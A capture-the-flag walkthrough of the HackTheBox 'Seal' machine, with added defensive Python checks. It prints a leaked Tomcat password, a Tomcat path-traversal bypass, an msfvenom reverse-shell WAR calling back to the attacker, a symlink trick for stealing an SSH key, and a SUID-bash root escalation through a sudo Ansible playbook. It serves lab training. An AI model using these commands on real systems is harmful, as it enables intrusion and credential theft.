Seal HackTheBox Detailed Writeup


DIFFICULTY LEVEL

OS = LINUX

INITIAL-SHELL = EASY

USER = DIFFICULT 

ROOT = PRETTY EASY

NMAP

I always start with Nmap:

 # Nmap 7.91 scan initiated Sun Jul 11 09:36:44 2021 as: nmap -sV -sC -vv -Pn -oN nmap 10.10.10.250  
 Nmap scan report for 10.10.10.250  
 Host is up, received user-set (0.19s latency).  
 Scanned at 2021-07-11 09:36:46 IST for 44s  
 Not shown: 997 closed ports  
 Reason: 997 resets  
 PORT   STATE SERVICE  REASON     VERSION  
 22/tcp  open ssh    syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)  
 | ssh-hostkey:   
 |  3072 4b:89:47:39:67:3d:07:31:5e:3f:4c:27:41:1f:f9:67 (RSA)  
 | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC1FohcrXkoPYUOtmzAh5PlCU2H0+sFcGl6XXS6vX2lLJ3RD2Vd+KlcYtc2wQLjcYJhkFe793jmkogOSh0uI+fKQA9z1Ib3J0vtsIaNkXxvSMPcr54QxXgg1guaM1OQl43ePUADXnB6WqAg8QyF6Nxoa18vboOAu3a8Wn9Qf9iCpoU93d5zQj+FsBKVaDs3zuJkUBRfjsqq7rEMpxqCfkFIeUrJF9MBsQhgsEVUbo1zicWG32m49PgDbKr9yE3lPsV9K4b9ugNQ3zwWW5a1OpOs+r3AxFcu2q65N2znV3/p41ul9+fWXo9pm0jJPJ3V5gZphDkXVZEw16K2hcgQcQJUH7luaVTRpzqDxXaiK/8wChtMXEUjFQKL6snEskkRxCg+uLO6HjI19dJ7sTBUkjdMK58TM5RmK8EO1VvbCAAdlMs8G064pSFKxY/iQjp7VWuaqBUetpplESpIe6Bz+tOyTJ8ZyhkJimFG80iHoKWYI2TOa5FdlXod1NvTIkCLD2U=  
 |  256 04:a7:4f:39:95:65:c5:b0:8d:d5:49:2e:d8:44:00:36 (ECDSA)  
 | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBD+SiHX7ZTaXWFgBUKSVlFmMYtqF7Ihjfdc51aEdxFdB3xnRWVYSJd2JhOX1k/9V62eZMhR/4Lc8pJWQJHdSA/c=  
 |  256 b4:5e:83:93:c5:42:49:de:71:25:92:71:23:b1:85:54 (ED25519)  
 |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMXLlJgua8pjAw5NcWgGDwXoASfUOqUlpeQxd66seKyT  
 443/tcp open ssl/http  syn-ack ttl 63 nginx 1.18.0 (Ubuntu)  
 | http-methods:   
 |_ Supported Methods: OPTIONS GET HEAD POST  
 |_http-server-header: nginx/1.18.0 (Ubuntu)  
 |_http-title: Seal Market  
 | ssl-cert: Subject: commonName=seal.htb/organizationName=Seal Pvt Ltd/stateOrProvinceName=London/countryName=UK/localityName=Hackney/emailAddress=admin@seal.htb/organizationalUnitName=Infra  
 | Issuer: commonName=seal.htb/organizationName=Seal Pvt Ltd/stateOrProvinceName=London/countryName=UK/localityName=hackney/emailAddress=admin@seal.htb/organizationalUnitName=Infra  
 | Public Key type: rsa  
 | Public Key bits: 2048  
 | Signature Algorithm: sha256WithRSAEncryption  
 | Not valid before: 2021-05-05T10:24:03  
 | Not valid after: 2022-05-05T10:24:03  
 | MD5:  9c4f 991a bb97 192c df5a c513 057d 4d21  
 | SHA-1: 0de4 6873 0ab7 3f90 c317 0f7b 872f 155b 305e 54ef  
 | tls-alpn:   
 |_ http/1.1  
 | tls-nextprotoneg:   
 |_ http/1.1  
 8080/tcp open http-proxy syn-ack ttl 63  
 | fingerprint-strings:   
 |  FourOhFourRequest:   
 |   HTTP/1.1 401 Unauthorized  
 |   Date: Sun, 11 Jul 2021 04:08:15 GMT  
 |   Set-Cookie: JSESSIONID=node01oxumfnzyr60s1qvyhewweivpt51389.node0; Path=/; HttpOnly  
 |   Expires: Thu, 01 Jan 1970 00:00:00 GMT  
 |   Content-Type: text/html;charset=utf-8  
 |   Content-Length: 0  
 |  GetRequest:   
 |   HTTP/1.1 401 Unauthorized  
 |   Date: Sun, 11 Jul 2021 04:08:12 GMT  
 |   Set-Cookie: JSESSIONID=node0ebvtc1vw1437lrblzejfp3fv51387.node0; Path=/; HttpOnly  
 |   Expires: Thu, 01 Jan 1970 00:00:00 GMT  
 |   Content-Type: text/html;charset=utf-8  
 |   Content-Length: 0  
 |  HTTPOptions:   
 |   HTTP/1.1 200 OK  
 |   Date: Sun, 11 Jul 2021 04:08:13 GMT  
 |   Set-Cookie: JSESSIONID=node0u0dxtzin5jbf1ghz5nuihd3bi51388.node0; Path=/; HttpOnly  
 |   Expires: Thu, 01 Jan 1970 00:00:00 GMT  
 |   Content-Type: text/html;charset=utf-8  
 |   Allow: GET,HEAD,POST,OPTIONS  
 |   Content-Length: 0  
 |  RPCCheck:   
 |   HTTP/1.1 400 Illegal character OTEXT=0x80  
 |   Content-Type: text/html;charset=iso-8859-1  
 |   Content-Length: 71  
 |   Connection: close  
 |   <h1>Bad Message 400</h1><pre>reason: Illegal character OTEXT=0x80</pre>  
 |  RTSPRequest:   
 |   HTTP/1.1 505 Unknown Version  
 |   Content-Type: text/html;charset=iso-8859-1  
 |   Content-Length: 58  
 |   Connection: close  
 |   <h1>Bad Message 505</h1><pre>reason: Unknown Version</pre>  
 |  Socks4:   
 |   HTTP/1.1 400 Illegal character CNTL=0x4  
 |   Content-Type: text/html;charset=iso-8859-1  
 |   Content-Length: 69  
 |   Connection: close  
 |   <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x4</pre>  
 |  Socks5:   
 |   HTTP/1.1 400 Illegal character CNTL=0x5  
 |   Content-Type: text/html;charset=iso-8859-1  
 |   Content-Length: 69  
 |   Connection: close  
 |_  <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x5</pre>  
 | http-auth:   
 | HTTP/1.1 401 Unauthorized\x0D  
 |_ Server returned status 401 but no WWW-Authenticate header.  
 | http-methods:   
 |_ Supported Methods: GET HEAD POST OPTIONS  

Woah! That is a huge output.

ENUMERATION

PORT 8080

http://seal.htb:8080/

seal.htb:8080 shows a GitBucket login form.

After I register an account in GitBucket,



I then find new usernames:



Alex and Luis

Let's enumerate GitBucket further. Hurrah! We find the Tomcat username and password in this commit:


http://seal.htb:8080/root/seal_market/commit/971f3aa3f0a0cc8aac12fd696d9631ca540f44c7




The username is tomcat

password is 42MrHBf*z8{Z%


I tried to log in to http://seal.htb:8080/ as the tomcat user, but it throws an error.



So I tried the other usernames, Alex and Luis.

Luis logs in with this password :)


After a long enumeration I find nothing else useful, but it does point at Tomcat. OK.

Let's enumerate the other port, 443 (https://seal.htb/).

PORT 443




Directory brute forcing:


 ffuf -w /usr/share/dirb/wordlists/common.txt -u https://seal.htb/FUZZ -fc 403 -recursion

 ffuf v1.2.0-git
 ________________________________________________
  :: Method           : GET
  :: URL              : https://seal.htb/FUZZ
  :: Wordlist         : FUZZ: /usr/share/dirb/wordlists/common.txt
  :: Follow redirects : false
  :: Calibration      : false
  :: Timeout          : 10
  :: Threads          : 40
  :: Matcher          : Response status: 200,204,301,302,307,401,403
  :: Filter           : Response status: 403
 ________________________________________________
                         [Status: 200, Size: 19736, Words: 7425, Lines: 519]
 admin                   [Status: 302, Size: 0, Words: 1, Lines: 1]
 css                     [Status: 302, Size: 0, Words: 1, Lines: 1]
 ez                      [Status: 302, Size: 0, Words: 1, Lines: 1]
 host-manager            [Status: 302, Size: 0, Words: 1, Lines: 1]
 icon                    [Status: 302, Size: 0, Words: 1, Lines: 1]
 images                  [Status: 302, Size: 0, Words: 1, Lines: 1]
 index.html              [Status: 200, Size: 19736, Words: 7425, Lines: 519]
 js                      [Status: 302, Size: 0, Words: 1, Lines: 1]
 manager                 [Status: 302, Size: 0, Words: 1, Lines: 1]
 test                    [Status: 302, Size: 0, Words: 1, Lines: 1]
 :: Progress: [4614/4614] :: Job [1/1] :: 89 req/sec :: Duration: [0:01:00] :: Errors: 0 ::

Then I fuzz https://seal.htb/manager/FUZZ as well, which leads to the Tomcat login.

Try to log in with the same password we found earlier in GitBucket.

Logged in successfully.


 

Tomcat version 9.0.31. After googling I found some potential vulnerabilities: the first one is path traversal, the second one is remote code execution.

The remote code execution won't work, but the path traversal works perfectly:



https://seal.htb/manager/status/..;/html
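As an added example (not code from the writeup), a small log check that models why a request like /manager/status/..;/html gets through: Tomcat strips ";" path parameters from each segment before it merges dot-segments, while a prefix-matching reverse proxy such as nginx does not, so the two resolve the same request to different paths. The access-log lines and the list of protected prefixes are constructed assumptions for the demo.

```python
import re
from urllib.parse import unquote

# Constructed sample nginx access-log lines (not taken from the box).
SAMPLE_LOG = """\
10.10.14.5 - - [11/Jul/2021:10:01:02 +0000] "GET /manager/status HTTP/1.1" 401 0
10.10.14.5 - - [11/Jul/2021:10:01:09 +0000] "GET /manager/status/..;/html HTTP/1.1" 200 5120
10.10.14.5 - - [11/Jul/2021:10:01:15 +0000] "GET /manager/html HTTP/1.1" 403 0
10.10.14.5 - - [11/Jul/2021:10:02:30 +0000] "GET /admin/dashboard;jsessionid=ABC123 HTTP/1.1" 200 900
10.10.14.5 - - [11/Jul/2021:10:03:00 +0000] "GET /images/../manager/html HTTP/1.1" 403 0
"""

# Assumed: paths the proxy is meant to deny (the Tomcat manager apps).
PROTECTED = ("/manager/html", "/host-manager")
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def _resolve_dots(segments):
    """Merge '.' and '..' segments the way an RFC 3986 normaliser does."""
    out = []
    for seg in segments:
        if seg in ("", "."):
            continue
        if seg == "..":
            if out:
                out.pop()
            continue
        out.append(seg)
    return "/" + "/".join(out)

def proxy_view(path):
    """The path as a prefix-matching proxy sees it: dot-segments are merged but
    ';params' remain part of the segment name, so '..;' is not a dot-segment."""
    return _resolve_dots(unquote(path.split("?", 1)[0]).split("/"))

def tomcat_view(path):
    """The path as Tomcat resolves it: path parameters are stripped from every
    segment *before* dot-segments are merged, so '/a/..;/b' becomes '/b'."""
    segs = [s.split(";", 1)[0] for s in unquote(path.split("?", 1)[0]).split("/")]
    return _resolve_dots(segs)

def is_bypass(path, protected=PROTECTED):
    """True when Tomcat would serve a protected resource that the proxy's view misses."""
    hits = lambda p: any(p == pre or p.startswith(pre + "/") for pre in protected)
    return hits(tomcat_view(path)) and not hits(proxy_view(path))

def scan_log(text, protected=PROTECTED):
    """Return (status, raw_path, tomcat_view) for each request that bypasses the proxy rule."""
    flagged = []
    for line in text.splitlines():
        m = LOG_RE.search(line)
        if m and is_bypass(m["path"], protected):
            flagged.append((int(m["status"]), m["path"], tomcat_view(m["path"])))
    return flagged
```

A plain /manager/html or /images/../manager/html is normalised identically on both sides and is caught by the proxy; only the ";"-hidden dot-segment is flagged, and a legitimate ;jsessionid= path parameter is not.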

 



Hurrah! We can upload a WAR file.

Let's create a WAR reverse shell with msfvenom, then upload it and get a beautiful shell :)

 msfvenom -p java/jsp_shell_reverse_tcp LHOST=<your-htb-ip> LPORT=9080 -f war -o rce.war

Upload your shell at that location (shown in the screenshot above). We can't upload it directly because we don't have access to that URL,



so we use the path traversal vulnerability with Burp.

Open Burp, intercept the upload request and change it like this:




TRIGGER THE SHELL



Got a shell as tomcat.


HORIZONTAL PRIVILEGE ESCALATION

USER.TXT 

Looking at what processes are running:

ps -aux



There is a .ansible directory in Luis's home directory, and a process running as Luis, probably a backup service.



Exploit the Process

Steps to Exploit

cat /opt/backups/playbook/run.yml

 - hosts: localhost
   tasks:
   - name: Copy Files
     synchronize: src=/var/lib/tomcat9/webapps/ROOT/admin/dashboard dest=/opt/backups/files copy_links=yes
   - name: Server Backups
     archive:
       path: /opt/backups/files/
       dest: "/opt/backups/archives/backup-{{ansible_date_time.date}}-{{ansible_date_time.time}}.gz"
   - name: Clean
     file:
       state: absent
       path: /opt/backups/files/

The interesting part is copy_links=yes: the rsync run behind synchronize follows symlinks and copies the files they point to, not the links themselves. That gave me the idea to create a symlink to a file or folder.
Looking at the permissions of the folder, we have only read-only access to it,

but we have write access to /var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads.
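As an added example (not the box's playbook or the author's code), the check a backup job like this should run before a dereferencing copy: walk the source tree and flag any symlink whose target resolves outside it, since that is exactly what copy_links=yes would pull into the archive. The temporary directory layout, the file names and the escaping_symlinks helper are constructed for the demo.

```python
import os
import tempfile

def escaping_symlinks(src_root):
    """Return (relative link path, link text, resolved target) for every symlink under
    src_root whose target lies outside src_root. A copy that follows links
    (rsync -L / copy_links=yes) would copy those targets' contents."""
    root = os.path.realpath(src_root)
    found = []
    for dirpath, dirnames, filenames in os.walk(src_root):   # does not follow links
        for name in dirnames + filenames:
            p = os.path.join(dirpath, name)
            if not os.path.islink(p):
                continue
            target = os.path.realpath(p)
            if os.path.commonpath([root, target]) != root:
                found.append((os.path.relpath(p, src_root), os.readlink(p), target))
    return found

def demo():
    """Constructed layout mirroring the writeup: a web app 'uploads' directory that
    contains a link to a user's .ssh directory, plus a harmless in-tree link."""
    base = tempfile.mkdtemp()
    home_ssh = os.path.join(base, "home", "luis", ".ssh")
    uploads = os.path.join(base, "dashboard", "uploads")
    os.makedirs(home_ssh)
    os.makedirs(uploads)
    with open(os.path.join(home_ssh, "id_rsa"), "w") as f:
        f.write("PLACEHOLDER-KEY-MATERIAL\n")          # constructed, not a real key
    with open(os.path.join(uploads, "logo.png"), "wb") as f:
        f.write(b"\x89PNG")
    os.symlink(home_ssh, os.path.join(uploads, "ssh"))             # escapes the tree
    os.symlink("logo.png", os.path.join(uploads, "logo-link.png"))  # stays inside: fine
    return escaping_symlinks(os.path.join(base, "dashboard"))

if __name__ == "__main__":
    for rel, link, target in demo():
        print(f"{rel} -> {link} (resolves to {target}, outside the source tree)")
```

Only the link that leaves the tree is reported; the in-tree logo-link.png is left alone, so the check does not break legitimate links inside the web root.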

Steps to become user Luis (run these from a directory you can write to, and use the archive name that ls shows you, since it carries the date and time of the backup run):

 ln -s /home/luis/.ssh/ /var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads
 ls /opt/backups/archives/
 cp /opt/backups/archives/backup-2021-07-13-03:00:32.gz rsa.gz
 gzip -kd rsa.gz
 tar -xf rsa
 cd dashboard
 cd uploads
 cd .ssh
 cat id_rsa
 < TRANSFER TO YOUR LOCAL MACHINE >

I use Python's http.server to transfer it; you can also use Netcat.

victim machine

python3 -m http.server 9091

our local machine

wget http://seal.htb:9091/id_rsa



USER: luis's id_rsa


chmod 600 id_rsa

ssh -i id_rsa luis@seal.htb


ROOT PRIVILEGE ESCALATION

sudo -l



Now we can see that we can run ansible-playbook as root.

This was easier than the user part: just create a malicious YAML playbook and it will run any command as root.

For reference:

https://www.middlewareinventory.com/blog/ansible-command-examples/ 

What is a playbook?

https://www.redhat.com/en/topics/automation/what-is-an-ansible-playbook

sakthi.yml:

 - hosts: localhost
   tasks:
   - name: test
     command: "chmod +s /bin/bash"

And just run:

sudo ansible-playbook sakthi.yml

/bin/bash -p

It's pretty easy compared to the user part :)




3 Comments

  1. keep getting this error

    cp: cannot stat '/opt/backups/archives/backup-2021-07-13-03:00:32.gz': No such file or directory

  2. getting this error now.


    gzip: backup-2021-07-21-03:55:34: Read-only file system

  3. The .yml file gives me errors

    ERROR! no module/action detected in task.

